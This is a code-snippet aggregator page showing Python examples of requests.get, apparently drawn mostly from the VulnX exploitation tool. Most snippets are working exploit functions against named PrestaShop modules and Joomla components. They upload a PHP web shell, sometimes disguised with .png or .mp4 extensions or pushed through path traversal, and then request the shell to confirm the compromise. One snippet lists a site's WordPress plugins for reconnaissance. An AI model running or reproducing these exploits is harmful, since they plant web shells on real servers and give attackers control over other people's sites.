Here are the examples of the python api requests.get.text taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
145 Examples
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def wg24themeadministration(url,headers):
endpoint = url + "/modules//wg24themeadministration/wg24_ajax.php"
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.php')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}),
'type' : 'pattern_upload' }
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s wg24themeadmin %s %s' %(que,vulnexploit,shellup))
else:
print(' %s wg24themeadmin %s' %(que , failexploit))
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def vtslide(url,headers):
endpoint = url + "/modules/vtermslideshow/uploadimage.php"
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.php')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s vterm-slideshowbar %s %s' %(que,vulnexploit,shellup))
else:
print(' %s vterm-slideshowbar %s' %(que , failexploit))
3
View Complete Implementation : jooExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def com_jbcatalog(url,headers):
endpoint = url + "/components/com_jbcatalog/libraries/jsupload/server/php"
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.php')
fieldname = "image[]"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files }
upload_file = Session.post(endpoint,data)
shellup = url + "/components/com_jbcatalog/libraries/jsupload/server/php/files/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s com_jbcatalog %s %s' %(que,vulnexploit,shellup))
else:
print(' %s com_jbcatalog %s' %(que , failexploit))
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def attributewizardpro_x(url,headers):
endpoint = url + "/modules/attributewizardpro_x/file_upload.php"
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.php')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s attributewizardpro %s %s' %(que,vulnexploit,shellup))
else:
print(' %s attributewizardpro %s' %(que , failexploit))
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def columnadverts(url,headers):
endpoint = url + "/modules/columnadverts/uploadimage.php"
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.php')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/columnadverts/slides/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
if statusCheck:
print(' %s column-advert %s %s' %(que,vulnexploit,shellup))
else:
print(' %s column-advert %s' %(que , failexploit))
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def videostab(url,headers):
endpoint = url + "/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload"
img = open('shell/VulnX.php.mp4', 'rb')
name_img= os.path.basename('shell/VulnX.php.mp4')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s videostab %s %s' %(que,vulnexploit,shellup))
else:
print(' %s videostab %s' %(que , failexploit))
3
View Complete Implementation : jooExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def com_rokdownloads(url,headers):
endpoint = url + "/administrator/components/com_rokdownloads/astets/uploadhandler.php"
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.php')
fieldname = "Filedata"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files,
'jpath' : '..%2F..%2F..%2F..%2F',
}
upload_file = Session.post(endpoint,data)
shellup = url + "/images/stories/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s com_rokdownloads %s %s' %(que,vulnexploit,shellup))
else:
print(' %s com_rokdownloads %s' %(que , failexploit))
3
View Complete Implementation : wpGrabber.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def wp_plugin(url,headers,grabinfo):
plugins_array = []
ep = url
getplugin = requests.get(ep,headers).text
matches = re.findall(re.compile(r'wp-content/plugins/(\w+)?/'),getplugin)
if len(matches) > 0:
for plugin in matches:
if plugin not in plugins_array:
plugins_array.append(plugin)
for i in range(len(plugins_array)):
print (' %s Plugins : %s ' %(good , plugins_array[i]))
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def advancedslider(url,headers):
endpoint = url + "/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php"
img = open('shell/VulnX.php.png', 'rb')
name_img= os.path.basename('shell/VulnX.php.png')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s advancedslider %s %s' %(que,vulnexploit,shellup))
else:
print(' %s advancedslider %s' %(que , failexploit))
3
View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
Copyright GNU General Public License v3.0
Author : anouarbensaad
def cartabandonmentpro(url,headers):
endpoint = url + "/modules/cartabandonmentpro/upload.php"
img = open('shell/VulnX.php.png', 'rb')
name_img= os.path.basename('shell/VulnX.php.png')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
upload_file = Session.post(endpoint,files=files)
shellup = url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
print(' %s cartabandonmentpro %s %s' %(que,vulnexploit,shellup))
else:
print(' %s cartabandonmentpro %s' %(que , failexploit))